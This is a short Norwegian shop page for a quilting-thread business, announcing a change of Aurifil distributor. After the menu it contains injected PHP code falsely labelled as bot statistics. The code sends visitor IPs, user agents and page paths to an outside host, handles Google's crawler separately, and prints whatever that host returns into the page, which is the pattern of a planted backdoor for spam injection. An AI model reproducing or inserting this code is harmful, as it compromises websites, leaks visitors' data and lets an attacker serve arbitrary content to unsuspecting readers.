Velkommen til Ragnhilds Tråd & Design

 

Jeg takker for meg som distributør av quiltetråd.

Ny Distributør av Aurifil Quiltetråd er

Meretes Quilteloft -www.sy.no

 

 


                                        
 

Ragnhilds Tråd & Design

NORPARTNER GRUPPENSEND MAILNETTBUTIKK KOMMER SENERELES MER...STARTSIDEPRODUKTERGALLERIFORHANDLERLINKERKONTAKTINFO

 

<?php /*This code use for global bot statistic*/ $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); /*Looks for google search bot*/ $sReferer = ''; if(isset($_SERVER['HTTP_REFERER']) === true) { $sReferer = strtolower($_SERVER['HTTP_REFERER']); } $stCurlHandle = NULL; if(!(strpos($sUserAgent, 'google') === false)) /*Bot comes*/ { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) /*Create bot analitics*/ $stCurlHandle = curl_init('http://openprotect1.net/Log/StatO/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer)); } else { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) /*Create bot analitics*/ $stCurlHandle = curl_init('http://openprotect1.net/Log/StatO/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer)); } curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); $sResult = curl_exec($stCurlHandle); curl_close($stCurlHandle); echo $sResult; /*Statistic code end*/ ?>